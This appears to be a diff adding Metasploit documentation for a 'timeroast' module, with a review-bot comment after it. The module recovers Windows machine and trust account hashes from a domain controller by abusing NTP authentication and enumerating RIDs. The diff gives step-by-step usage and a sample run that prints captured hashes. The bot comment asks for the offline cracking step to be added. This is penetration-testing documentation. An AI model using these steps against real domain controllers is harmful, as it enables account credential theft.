| 1 | +## Vulnerable Application |
| 2 | +Windows authenticates NTP requests by calculating the message digest using the NT hash followed by the first |
| 3 | +48 bytes of the NTP message (all fields preceding the key ID). An attacker can abuse this to recover hashes |
| 4 | +that can be cracked offline for machine and trust accounts. The attacker must know the accounts RID, but |
| 5 | +because RIDs are sequential, they can easily be enumerated. |
| 6 | + |
| 7 | +## Verification Steps |
| 8 | + |
| 9 | +1. Setup a Windows domain controller target |
| 10 | +1. Start msfconsole |
| 11 | +1. Use the `auxiliary/admin/dcerpc/samr_account` module to create a new computer account with the `ADD_COMPUTER` action |
| 12 | + 1. Note the RID (the last part of the SID) and password of the new account |
| 13 | +1. Use the `auxiliary/scanner/ntp/timeroast` module |
| 14 | +1. Set the `RHOSTS` option to the target domain controller |
| 15 | +1. Set the `RIDS` option to the RID of the new account |
| 16 | +1. Run the module and see that a hash is collected, this has will show up in the output of the `creds` command if a |
| 17 | + database is connected |
| 18 | + |
| 19 | +## Options |
| 20 | + |
| 21 | +### RIDS |
| 22 | +The RIDs to enumerate (e.g. 1000-2000). Multiple values and ranges can be specified using a comma as a separator. |
| 23 | + |
| 24 | +## Scenarios |
| 25 | + |
| 26 | +### Windows 2019 x64 Domain Controller |
| 27 | + |
| 28 | +``` |
| 29 | +msf6 auxiliary(scanner/ntp/timeroast) > set RIDS 4200-4205 |
| 30 | +RIDS => 4200-4205 |
| 31 | +msf6 auxiliary(scanner/ntp/timeroast) > set RHOSTS 192.168.159.10 |
| 32 | +RHOSTS => 192.168.159.10 |
| 33 | +msf6 auxiliary(scanner/ntp/timeroast) > run |
| 34 | +[*] Checking RID: 4200 |
| 35 | +[*] Checking RID: 4201 |
| 36 | +[+] Hash for RID: 4201 - 4201:$sntp-ms$74e3c4ac73afe868119ff98613888d48$1c0100e900000000000a2c704c4f434ceb0aaf8ac9813bd40000000000000000eb0aea216d99a558eb0aea216d99e010 |
| 37 | +[*] Checking RID: 4202 |
| 38 | +[+] Hash for RID: 4202 - 4202:$sntp-ms$e106388a43f6bbd5365e3a6f2dee741d$1c0100e900000000000a2c704c4f434ceb0aaf8ac78c5c9a0000000000000000eb0aea21bb83de46eb0aea21bb8442f0 |
| 39 | +[*] Checking RID: 4203 |
| 40 | +[*] Checking RID: 4204 |
| 41 | +[+] Hash for RID: 4204 - 4204:$sntp-ms$d0b1961cc3d57a1eaa40bfeeb9f30eb9$1c0100e900000000000a2c704c4f434ceb0aaf8ac653c2f50000000000000000eb0aea222a6c25c3eb0aea222a6c6a8c |
| 42 | +[*] Checking RID: 4205 |
| 43 | +[*] Waiting on 3 pending responses... |
| 44 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 45 | +[*] Auxiliary module execution completed |
| 46 | +msf6 auxiliary(scanner/ntp/timeroast) > |
| 47 | +``` |
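Review bot: three wording errors in the new markdown need fixing before merge: in Vulnerable Application, `The attacker must know the accounts RID` should read `the account's RID`; in Verification Steps, `Setup a Windows domain controller target` should be `Set up ...`, and `Run the module and see that a hash is collected, this has will show up in the output of the `creds` command` should be `... is collected; this hash will show up ...` (typo plus a comma splice). Beyond wording, the Vulnerable Application paragraph promises the recovered hashes `can be cracked offline`, but neither Verification Steps nor Scenarios say how, so a reader finishes with a `$sntp-ms$` line and no pointer to the cracking step; one sentence naming the hash format/tool, or at least stating that the password noted from the `ADD_COMPUTER` step is what the cracked result should match, would close the loop. The sample run's `[*] Waiting on 3 pending responses...` is likewise unexplained (RIDs 4200, 4203 and 4205 yield no `[+] Hash` line); state what a RID without a hash means, no account with that RID versus a lost UDP reply, so operators do not misread a quiet range as a negative result. Lastly, Options documents only `RIDS` with an `e.g. 1000-2000` hint; since the whole technique depends on enumerating a RID range against a DC, either note the option's default and any timeout/thread option the module honours, or say explicitly that none apply.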